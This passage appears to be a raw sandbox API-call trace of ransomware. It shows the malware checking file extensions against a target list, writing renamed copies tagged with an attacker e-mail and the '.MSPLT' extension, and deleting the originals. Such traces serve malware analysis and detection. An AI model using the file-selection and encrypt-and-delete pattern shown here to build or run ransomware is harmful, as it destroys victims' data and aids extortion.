lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0309.558] WriteFile (in: hFile=0x520, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0309.558] SetEndOfFile (hFile=0x520) returned 1 [0309.559] CloseHandle (hObject=0x520) returned 1 [0309.566] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0309.566] SetEndOfFile (hFile=0x524) returned 1 [0309.572] CloseHandle (hObject=0x524) returned 1 [0309.572] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0309.573] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00921_.wmf")) returned 1 [0309.574] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 68 [0309.574] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 68 [0309.574] lstrlenW (lpString=".doc") returned 4 [0309.574] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0309.574] lstrlenW (lpString=".docx") returned 5 [0309.574] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0309.574] lstrlenW (lpString=".pdf") returned 4 [0309.574] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0309.575] lstrlenW (lpString=".xls") returned 4 [0309.575] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0309.575] lstrlenW (lpString=".xlsx") returned 5 [0309.575] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0309.575] lstrlenW (lpString=".ppt") returned 4 [0309.575] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0309.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 68 [0309.575] lstrlenW (lpString=".zip") returned 4 [0309.575] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0309.575] lstrlenW (lpString=".rar") returned 4 [0309.575] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0309.575] lstrlenW (lpString=".bz2") returned 4 [0309.575] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0309.575] lstrlenW (lpString=".7z") returned 3 [0309.575] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0309.576] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 68 [0309.576] lstrlenW (lpString=".dbf") returned 4 [0309.576] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0309.576] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 68 [0309.576] lstrlenW (lpString=".1cd") returned 4 [0309.576] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0309.576] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 68 [0309.576] lstrlenW (lpString=".jpg") returned 4 [0309.576] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0309.576] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 68 [0309.576] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 68 [0309.576] lstrlenW (lpString=".doc") returned 4 [0309.576] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0309.576] lstrlenW (lpString=".docx") returned 5 [0309.577] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0309.577] lstrlenW (lpString=".pdf") returned 4 [0309.577] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0309.577] lstrlenW (lpString=".xls") returned 4 [0309.577] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0309.577] lstrlenW (lpString=".xlsx") returned 5 [0309.577] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0309.577] lstrlenW (lpString=".ppt") returned 4 [0309.577] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0309.577] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 68 [0309.577] lstrlenW (lpString=".zip") returned 4 [0309.577] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0309.577] lstrlenW (lpString=".rar") returned 4 [0309.577] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0309.578] lstrlenW (lpString=".bz2") returned 4 [0309.578] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0309.578] lstrlenW (lpString=".7z") returned 3 [0309.578] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0309.578] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 68 [0309.578] lstrlenW (lpString=".dbf") returned 4 [0309.578] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0309.578] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 68 [0309.578] lstrlenW (lpString=".1cd") returned 4 [0309.578] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0309.578] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 68 [0309.578] lstrlenW (lpString=".jpg") returned 4 [0309.578] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0309.579] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0309.579] lstrlenW (lpString="BOAT.WMF") returned 8 [0309.579] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\boat.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x524 [0309.581] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=3350) returned 1 [0309.582] CloseHandle (hObject=0x524) returned 1 [0309.582] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\boat.wmf")) returned 0x220 [0309.582] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\boat.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0309.582] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\boat.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x524 [0309.582] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0309.582] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0309.583] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\boat.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x520 [0309.583] GetLastError () returned 0x0 [0309.583] ReadFile (in: hFile=0x524, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0xd16, lpOverlapped=0x0) returned 1 [0309.586] WriteFile (in: hFile=0x520, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xd20, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xd20, lpOverlapped=0x0) returned 1 [0309.587] ReadFile (in: hFile=0x524, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0309.587] WriteFile (in: hFile=0x520, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xe4, lpOverlapped=0x0) returned 1 [0309.587] SetEndOfFile (hFile=0x520) returned 1 [0309.588] CloseHandle (hObject=0x520) returned 1 [0309.592] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0309.592] SetEndOfFile (hFile=0x524) returned 1 [0310.618] CloseHandle (hObject=0x524) returned 1 [0310.618] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0310.749] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\boat.wmf")) returned 1 [0310.750] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF") returned 64 [0310.750] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF") returned 64 [0310.750] lstrlenW (lpString=".doc") returned 4 [0310.750] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0310.751] lstrlenW (lpString=".docx") returned 5 [0310.751] lstrcmpiW (lpString1=".docx", lpString2="T.WMF") returned -1 [0310.751] lstrlenW (lpString=".pdf") returned 4 [0310.751] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0310.751] lstrlenW (lpString=".xls") returned 4 [0310.751] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0310.751] lstrlenW (lpString=".xlsx") returned 5 [0310.751] lstrcmpiW (lpString1=".xlsx", lpString2="T.WMF") returned -1 [0310.751] lstrlenW (lpString=".ppt") returned 4 [0310.751] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0310.751] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF") returned 64 [0310.751] lstrlenW (lpString=".zip") returned 4 [0310.751] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0310.751] lstrlenW (lpString=".rar") returned 4 [0310.751] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0310.751] lstrlenW (lpString=".bz2") returned 4 [0310.751] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0310.751] lstrlenW (lpString=".7z") returned 3 [0310.751] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0310.751] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF") returned 64 [0310.751] lstrlenW (lpString=".dbf") returned 4 [0310.751] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0310.751] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF") returned 64 [0310.751] lstrlenW (lpString=".1cd") returned 4 [0310.751] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0310.751] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF") returned 64 [0310.752] lstrlenW (lpString=".jpg") returned 4 [0310.752] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0310.752] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF") returned 64 [0310.752] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF") returned 64 [0310.752] lstrlenW (lpString=".doc") returned 4 [0310.752] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0310.752] lstrlenW (lpString=".docx") returned 5 [0310.752] lstrcmpiW (lpString1=".docx", lpString2="T.WMF") returned -1 [0310.752] lstrlenW (lpString=".pdf") returned 4 [0310.752] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0310.752] lstrlenW (lpString=".xls") returned 4 [0310.752] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0310.752] lstrlenW (lpString=".xlsx") returned 5 [0310.752] lstrcmpiW (lpString1=".xlsx", lpString2="T.WMF") returned -1 [0310.752] lstrlenW (lpString=".ppt") returned 4 [0310.752] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0310.752] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF") returned 64 [0310.752] lstrlenW (lpString=".zip") returned 4 [0310.752] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0310.752] lstrlenW (lpString=".rar") returned 4 [0310.752] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0310.752] lstrlenW (lpString=".bz2") returned 4 [0310.752] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0310.752] lstrlenW (lpString=".7z") returned 3 [0310.752] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0310.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF") returned 64 [0310.753] lstrlenW (lpString=".dbf") returned 4 [0310.753] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0310.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF") returned 64 [0310.753] lstrlenW (lpString=".1cd") returned 4 [0310.753] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0310.753] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BOAT.WMF") returned 64 [0310.753] lstrlenW (lpString=".jpg") returned 4 [0310.753] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0310.753] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0310.753] lstrlenW (lpString="BS00145_.WMF") returned 12 [0310.753] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00145_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0310.754] GetFileSizeEx (in: hFile=0x488, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=1712) returned 1 [0310.754] CloseHandle (hObject=0x488) returned 1 [0310.754] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00145_.wmf")) returned 0x220 [0310.754] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00145_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0310.755] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00145_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0310.755] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0310.755] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0310.755] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00145_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x528 [0310.757] GetLastError () returned 0x0 [0310.757] ReadFile (in: hFile=0x488, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x6b0, lpOverlapped=0x0) returned 1 [0311.813] WriteFile (in: hFile=0x528, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0x6c0, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0x6c0, lpOverlapped=0x0) returned 1 [0311.815] ReadFile (in: hFile=0x488, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0311.815] WriteFile (in: hFile=0x528, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0311.815] SetEndOfFile (hFile=0x528) returned 1 [0311.815] CloseHandle (hObject=0x528) returned 1 [0311.816] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0311.816] SetEndOfFile (hFile=0x488) returned 1 [0311.820] CloseHandle (hObject=0x488) returned 1 [0311.820] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0312.504] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00145_.wmf")) returned 1 [0312.505] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 68 [0312.505] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 68 [0312.505] lstrlenW (lpString=".doc") returned 4 [0312.505] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0312.505] lstrlenW (lpString=".docx") returned 5 [0312.505] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0312.505] lstrlenW (lpString=".pdf") returned 4 [0312.505] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0312.505] lstrlenW (lpString=".xls") returned 4 [0312.505] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0312.505] lstrlenW (lpString=".xlsx") returned 5 [0312.505] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0312.505] lstrlenW (lpString=".ppt") returned 4 [0312.505] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0312.505] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 68 [0312.505] lstrlenW (lpString=".zip") returned 4 [0312.505] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0312.505] lstrlenW (lpString=".rar") returned 4 [0312.506] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0312.506] lstrlenW (lpString=".bz2") returned 4 [0312.506] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0312.506] lstrlenW (lpString=".7z") returned 3 [0312.506] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0312.506] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 68 [0312.506] lstrlenW (lpString=".dbf") returned 4 [0312.506] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0312.506] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 68 [0312.506] lstrlenW (lpString=".1cd") returned 4 [0312.506] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0312.506] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 68 [0312.506] lstrlenW (lpString=".jpg") returned 4 [0312.506] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0312.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 68 [0312.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 68 [0312.507] lstrlenW (lpString=".doc") returned 4 [0312.507] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0312.507] lstrlenW (lpString=".docx") returned 5 [0312.507] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0312.507] lstrlenW (lpString=".pdf") returned 4 [0312.507] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0312.507] lstrlenW (lpString=".xls") returned 4 [0312.507] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0312.507] lstrlenW (lpString=".xlsx") returned 5 [0312.507] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0312.507] lstrlenW (lpString=".ppt") returned 4 [0312.507] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0312.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 68 [0312.507] lstrlenW (lpString=".zip") returned 4 [0312.507] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0312.508] lstrlenW (lpString=".rar") returned 4 [0312.508] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0312.508] lstrlenW (lpString=".bz2") returned 4 [0312.508] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0312.508] lstrlenW (lpString=".7z") returned 3 [0312.508] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0312.508] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 68 [0312.508] lstrlenW (lpString=".dbf") returned 4 [0312.508] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0312.508] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 68 [0312.508] lstrlenW (lpString=".1cd") returned 4 [0312.509] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0312.509] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 68 [0312.509] lstrlenW (lpString=".jpg") returned 4 [0312.509] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0312.509] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0312.509] lstrlenW (lpString="BS00440_.WMF") returned 12 [0312.509] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00440_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x54c [0312.510] GetFileSizeEx (in: hFile=0x54c, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=5580) returned 1 [0312.510] CloseHandle (hObject=0x54c) returned 1 [0312.510] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00440_.wmf")) returned 0x220 [0312.511] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00440_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0312.511] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00440_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x54c [0312.511] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0312.511] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0312.511] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00440_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0312.643] GetLastError () returned 0x0 [0312.643] ReadFile (in: hFile=0x54c, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x15cc, lpOverlapped=0x0) returned 1 [0313.232] WriteFile (in: hFile=0x488, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0x15d0, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0x15d0, lpOverlapped=0x0) returned 1 [0313.235] ReadFile (in: hFile=0x54c, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0313.235] WriteFile (in: hFile=0x488, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, 